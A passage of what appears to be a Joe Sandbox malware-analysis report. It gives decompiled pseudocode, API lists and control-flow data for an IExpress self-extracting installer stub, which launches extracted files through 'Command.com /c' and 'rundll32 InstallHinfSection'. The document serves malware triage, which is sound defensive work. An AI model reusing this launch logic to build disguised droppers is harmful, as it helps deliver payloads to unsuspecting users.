                                                                                                                                                                                                        											_v360 = _t97;
                                                                                                                                                                                                        											if( *0xe88a30 != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t144 =  *0xe89a34; // 0x1
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t145 =  *0xe88d48; // 0x0
                                                                                                                                                                                                        											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t145;
                                                                                                                                                                                                        											if(_t145 < 0) {
                                                                                                                                                                                                        												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                        												__eflags = _t104;
                                                                                                                                                                                                        												_v360 = _t104;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t98 =  *0xe89a38; // 0x0
                                                                                                                                                                                                        											_v356 = _t98;
                                                                                                                                                                                                        											_t130 = _t146;
                                                                                                                                                                                                        											 *0xe8a288( &_v384);
                                                                                                                                                                                                        											_t101 = _v404();
                                                                                                                                                                                                        											__eflags = _t164 - _t164;
                                                                                                                                                                                                        											if(_t164 != _t164) {
                                                                                                                                                                                                        												_t130 = 4;
												asm("int 0x29");
											}
											 *0xe89124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0xe89a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0xe88a20;
										if( *0xe88a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E00E8202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E00E8468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0xe88c42;
									if( *0xe88c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0xe88a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E00E8468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E00E8468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00E81781( &_v276, 0x104, _t130, 0xe88c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E00E8468F(_t130, 0xe89a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}
                                                                                                                                                                                                        0x00e83de6
                                                                                                                                                                                                        0x00e83de6
                                                                                                                                                                                                        0x00e83de8
                                                                                                                                                                                                        0x00e83f0b
                                                                                                                                                                                                        0x00e83f0b
                                                                                                                                                                                                        0x00e83f0f
                                                                                                                                                                                                        0x00e83f13
                                                                                                                                                                                                        0x00e83f15
                                                                                                                                                                                                        0x00e83f1a
                                                                                                                                                                                                        0x00e83f1c
                                                                                                                                                                                                        0x00e83f46
                                                                                                                                                                                                        0x00e83f47
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83f47
                                                                                                                                                                                                        0x00e83f1e
                                                                                                                                                                                                        0x00e83f1f
                                                                                                                                                                                                        0x00e83f25
                                                                                                                                                                                                        0x00e83f26
                                                                                                                                                                                                        0x00e83f2a
                                                                                                                                                                                                        0x00e83f2d
                                                                                                                                                                                                        0x00e83fd9
                                                                                                                                                                                                        0x00e83fd9
                                                                                                                                                                                                        0x00e83fda
                                                                                                                                                                                                        0x00e83fda
                                                                                                                                                                                                        0x00e83fe1
                                                                                                                                                                                                        0x00e83fe3
                                                                                                                                                                                                        0x00e83fe3
                                                                                                                                                                                                        0x00e83fe8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83fe8
                                                                                                                                                                                                        0x00e83f33
                                                                                                                                                                                                        0x00e83f37
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83f37
                                                                                                                                                                                                        0x00e83dee
                                                                                                                                                                                                        0x00e83dee
                                                                                                                                                                                                        0x00e83df5
                                                                                                                                                                                                        0x00e83fad
                                                                                                                                                                                                        0x00e83fb9
                                                                                                                                                                                                        0x00e83fc2
                                                                                                                                                                                                        0x00e83fc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83fc8
                                                                                                                                                                                                        0x00e83dfb
                                                                                                                                                                                                        0x00e83dfd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83e03
                                                                                                                                                                                                        0x00e83e0a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83e15
                                                                                                                                                                                                        0x00e83e17
                                                                                                                                                                                                        0x00e83e19
                                                                                                                                                                                                        0x00e83f94
                                                                                                                                                                                                        0x00e83fa4
                                                                                                                                                                                                        0x00e83f7c
                                                                                                                                                                                                        0x00e83f80
                                                                                                                                                                                                        0x00e83f8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83f8b
                                                                                                                                                                                                        0x00e83e2c
                                                                                                                                                                                                        0x00e83e30
                                                                                                                                                                                                        0x00e83e34
                                                                                                                                                                                                        0x00e83e36
                                                                                                                                                                                                        0x00e83f69
                                                                                                                                                                                                        0x00e83f6e
                                                                                                                                                                                                        0x00e83f70
                                                                                                                                                                                                        0x00e83f76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83f76
                                                                                                                                                                                                        0x00e83e3c
                                                                                                                                                                                                        0x00e83e43
                                                                                                                                                                                                        0x00e83e47
                                                                                                                                                                                                        0x00e83e52
                                                                                                                                                                                                        0x00e83e56
                                                                                                                                                                                                        0x00e83e5c
                                                                                                                                                                                                        0x00e83e61
                                                                                                                                                                                                        0x00e83e68
                                                                                                                                                                                                        0x00e83e70
                                                                                                                                                                                                        0x00e83e74
                                                                                                                                                                                                        0x00e83e7c
                                                                                                                                                                                                        0x00e83e80
                                                                                                                                                                                                        0x00e83e82
                                                                                                                                                                                                        0x00e83e82
                                                                                                                                                                                                        0x00e83e87
                                                                                                                                                                                                        0x00e83e87
                                                                                                                                                                                                        0x00e83e8b
                                                                                                                                                                                                        0x00e83e91
                                                                                                                                                                                                        0x00e83e94
                                                                                                                                                                                                        0x00e83e96
                                                                                                                                                                                                        0x00e83e96
                                                                                                                                                                                                        0x00e83e9b
                                                                                                                                                                                                        0x00e83e9b
                                                                                                                                                                                                        0x00e83e9f
                                                                                                                                                                                                        0x00e83ea2
                                                                                                                                                                                                        0x00e83ea4
                                                                                                                                                                                                        0x00e83ea4
                                                                                                                                                                                                        0x00e83ea9
                                                                                                                                                                                                        0x00e83ea9
                                                                                                                                                                                                        0x00e83ead
                                                                                                                                                                                                        0x00e83eb3
                                                                                                                                                                                                        0x00e83eb6
                                                                                                                                                                                                        0x00e83eb8
                                                                                                                                                                                                        0x00e83eb8
                                                                                                                                                                                                        0x00e83ebd
                                                                                                                                                                                                        0x00e83ebd
                                                                                                                                                                                                        0x00e83ec1
                                                                                                                                                                                                        0x00e83ec3
                                                                                                                                                                                                        0x00e83ec5
                                                                                                                                                                                                        0x00e83ec5
                                                                                                                                                                                                        0x00e83eca
                                                                                                                                                                                                        0x00e83eca
                                                                                                                                                                                                        0x00e83ece
                                                                                                                                                                                                        0x00e83ed5
                                                                                                                                                                                                        0x00e83ed9
                                                                                                                                                                                                        0x00e83ee0
                                                                                                                                                                                                        0x00e83ee6
                                                                                                                                                                                                        0x00e83eea
                                                                                                                                                                                                        0x00e83eec
                                                                                                                                                                                                        0x00e83eee
                                                                                                                                                                                                        0x00e83ef3
                                                                                                                                                                                                        0x00e83ef3
                                                                                                                                                                                                        0x00e83ef5
                                                                                                                                                                                                        0x00e83efa
                                                                                                                                                                                                        0x00e83efb
                                                                                                                                                                                                        0x00e83efd
                                                                                                                                                                                                        0x00e83f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83eff
                                                                                                                                                                                                        0x00e83eff
                                                                                                                                                                                                        0x00e83f05
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E83C11
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00E83CDC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                          • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00E88C42), ref: 00E83D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00E83E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00E88C42), ref: 00E83EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00E88C42), ref: 00E83F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00E88C42), ref: 00E83F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00E88C42), ref: 00E83F47
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00E88C42), ref: 00E83F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00E88C42), ref: 00E83F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00E88C42), ref: 00E83FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                        • API String ID: 1032054927-2392195619
                                                                                                                                                                                                        • Opcode ID: 71d031fd22c5ecc3539076b465d51381dbfb6440714de8074ff528632936b6ac
                                                                                                                                                                                                        • Instruction ID: ef9050c9150627b5f44b9b4465dc02d2df64e30fbec41092b3a700c2e94c4e77
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71d031fd22c5ecc3539076b465d51381dbfb6440714de8074ff528632936b6ac
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61B1D270A083019FD724FF358945B6AB6E4EB84B04F14292AFA8DF61E1DB70C945CB92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 141 e81ae8-e81b2c call e81680 144 e81b3b-e81b40 141->144 145 e81b2e-e81b39 141->145 146 e81b46-e81b61 call e81a84 144->146 145->146 149 e81b9f-e81bc2 call e81781 call e8658a 146->149 150 e81b63-e81b65 146->150 157 e81bc7-e81bd3 call e866c8 149->157 152 e81b68-e81b6d 150->152 152->152 154 e81b6f-e81b74 152->154 154->149 156 e81b76-e81b7b 154->156 158 e81b7d-e81b81 156->158 159 e81b83-e81b86 156->159 166 e81bd9-e81bf1 CompareStringA 157->166 167 e81d73-e81d7f call e866c8 157->167 158->159 161 e81b8c-e81b9d call e81680 158->161 159->149 162 e81b88-e81b8a 159->162 161->157 162->149 162->161 166->167 168 e81bf7-e81c07 GetFileAttributesA 166->168 175 e81df8-e81e09 LocalAlloc 167->175 176 e81d81-e81d99 CompareStringA 167->176 170 e81c0d-e81c15 168->170 171 e81d53-e81d5e 168->171 170->171 174 e81c1b-e81c33 call e81a84 170->174 173 e81d64-e81d6e call e844b9 171->173 188 e81e94-e81ea4 call e86ce0 173->188 190 e81c50-e81c61 LocalAlloc 174->190 191 e81c35-e81c38 174->191 178 e81e0b-e81e1b GetFileAttributesA 175->178 179 e81dd4-e81ddf 175->179 176->175 181 e81d9b-e81da2 176->181 183 e81e1d-e81e1f 178->183 184 e81e67-e81e73 call e81680 178->184 179->173 186 e81da5-e81daa 181->186 183->184 189 e81e21-e81e3e call e81781 183->189 195 e81e78-e81e84 call e82aac 184->195 186->186 192 e81dac-e81db4 186->192 189->195 211 e81e40-e81e43 189->211 190->179 194 e81c67-e81c72 190->194 198 e81c3a 191->198 199 e81c40-e81c4b call e81a84 191->199 193 e81db7-e81dbc 192->193 193->193 200 e81dbe-e81dd2 LocalAlloc 193->200 202 e81c79-e81cc0 GetPrivateProfileIntA GetPrivateProfileStringA 194->202 203 e81c74 194->203 210 e81e89-e81e92 195->210 198->199 199->190 200->179 207 e81de1-e81df3 call e8171e 200->207 208 e81cf8-e81d07 202->208 209 e81cc2-e81ccc 202->209 203->202 207->210 216 
e81d09-e81d21 GetShortPathNameA 208->216 217 e81d23 208->217 213 e81cce 209->213 214 e81cd3-e81cf3 call e81680 * 2 209->214 210->188 211->195 215 e81e45-e81e65 call e816b3 * 2 211->215 213->214 214->210 215->195 218 e81d28-e81d2b 216->218 217->218 222 e81d2d 218->222 223 e81d32-e81d4e call e8171e 218->223 222->223 223->210
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00E81AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0xe88004; // 0x18391fe1
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00E81680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00E81A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00E81781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
					E00E8658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00E81680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00E866C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00E866C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00E81680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00E81781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00E816B3( &_v1552, 0x400, " ");
										E00E816B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00E82AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00E8171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00E81A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00E81A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
                                                                                                                                                                                                        									_t60 = 0;
                                                                                                                                                                                                        									_t140 = 0x4b5;
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									L35:
                                                                                                                                                                                                        									_push(_t60);
                                                                                                                                                                                                        									E00E844B9(0, _t140);
                                                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                                                        									goto L54;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t155 = _v1556;
                                                                                                                                                                                                        									_t92 = _t155;
                                                                                                                                                                                                        									if( *_t155 == 0) {
                                                                                                                                                                                                        										_t92 = "DefaultInstall";
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									 *0xe89120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                        									 *_v1560 = 1;
                                                                                                                                                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xe81140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                        										 *0xe89a34 =  *0xe89a34 & 0xfffffffb;
                                                                                                                                                                                                        										if( *0xe89a40 != 0) {
                                                                                                                                                                                                        											_t108 = "setupapi.dll";
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t108 = "setupx.dll";
                                                                                                                                                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_push( &_v268);
                                                                                                                                                                                                        										_push(_t155);
                                                                                                                                                                                                        										E00E8171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										 *0xe89a34 =  *0xe89a34 | 0x00000004;
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										E00E81680(_t108, 0x104, _t155);
                                                                                                                                                                                                        										_t140 = 0x200;
                                                                                                                                                                                                        										E00E81680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L53:
                                                                                                                                                                                                        									_t62 = 1;
                                                                                                                                                                                                        									 *_v1564 = _t156;
                                                                                                                                                                                                        									L54:
                                                                                                                                                                                                        									_pop(_t152);
                                                                                                                                                                                                        									return E00E86CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}














































                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81dd2
                                                                                                                                                                                                        0x00e81bf7
                                                                                                                                                                                                        0x00e81bfe
                                                                                                                                                                                                        0x00e81c07
                                                                                                                                                                                                        0x00e81d55
                                                                                                                                                                                                        0x00e81d5a
                                                                                                                                                                                                        0x00e81d5b
                                                                                                                                                                                                        0x00e81d5d
                                                                                                                                                                                                        0x00e81d5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81c1b
                                                                                                                                                                                                        0x00e81c1b
                                                                                                                                                                                                        0x00e81c20
                                                                                                                                                                                                        0x00e81c2c
                                                                                                                                                                                                        0x00e81c33
                                                                                                                                                                                                        0x00e81c38
                                                                                                                                                                                                        0x00e81c3a
                                                                                                                                                                                                        0x00e81c3a
                                                                                                                                                                                                        0x00e81c40
                                                                                                                                                                                                        0x00e81c4b
                                                                                                                                                                                                        0x00e81c4b
                                                                                                                                                                                                        0x00e81c5d
                                                                                                                                                                                                        0x00e81c61
                                                                                                                                                                                                        0x00e81dd4
                                                                                                                                                                                                        0x00e81dd4
                                                                                                                                                                                                        0x00e81dd6
                                                                                                                                                                                                        0x00e81ddb
                                                                                                                                                                                                        0x00e81ddc
                                                                                                                                                                                                        0x00e81dde
                                                                                                                                                                                                        0x00e81d64
                                                                                                                                                                                                        0x00e81d64
                                                                                                                                                                                                        0x00e81d67
                                                                                                                                                                                                        0x00e81d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81c67
                                                                                                                                                                                                        0x00e81c67
                                                                                                                                                                                                        0x00e81c6d
                                                                                                                                                                                                        0x00e81c72
                                                                                                                                                                                                        0x00e81c74
                                                                                                                                                                                                        0x00e81c74
                                                                                                                                                                                                        0x00e81c8e
                                                                                                                                                                                                        0x00e81c99
                                                                                                                                                                                                        0x00e81cc0
                                                                                                                                                                                                        0x00e81cf8
                                                                                                                                                                                                        0x00e81d07
                                                                                                                                                                                                        0x00e81d23
                                                                                                                                                                                                        0x00e81d09
                                                                                                                                                                                                        0x00e81d14
                                                                                                                                                                                                        0x00e81d1b
                                                                                                                                                                                                        0x00e81d1b
                                                                                                                                                                                                        0x00e81d2b
                                                                                                                                                                                                        0x00e81d2d
                                                                                                                                                                                                        0x00e81d2d
                                                                                                                                                                                                        0x00e81d38
                                                                                                                                                                                                        0x00e81d39
                                                                                                                                                                                                        0x00e81d46
                                                                                                                                                                                                        0x00e81cc2
                                                                                                                                                                                                        0x00e81cc2
                                                                                                                                                                                                        0x00e81ccc
                                                                                                                                                                                                        0x00e81cce
                                                                                                                                                                                                        0x00e81cce
                                                                                                                                                                                                        0x00e81cdb
                                                                                                                                                                                                        0x00e81ce6
                                                                                                                                                                                                        0x00e81cee
                                                                                                                                                                                                        0x00e81cee
                                                                                                                                                                                                        0x00e81e89
                                                                                                                                                                                                        0x00e81e91
                                                                                                                                                                                                        0x00e81e92
                                                                                                                                                                                                        0x00e81e94
                                                                                                                                                                                                        0x00e81e97
                                                                                                                                                                                                        0x00e81ea4
                                                                                                                                                                                                        0x00e81ea4
                                                                                                                                                                                                        0x00e81c61
                                                                                                                                                                                                        0x00e81c07
                                                                                                                                                                                                        0x00e81bd3
                                                                                                                                                                                                        0x00e81b7b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00E81BE7
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00E81BFE
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00E81C57
                                                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00E81C88
                                                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00E81140,00000000,00000008,?), ref: 00E81CB8
                                                                                                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 00E81D1B
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                        • API String ID: 383838535-2280873615
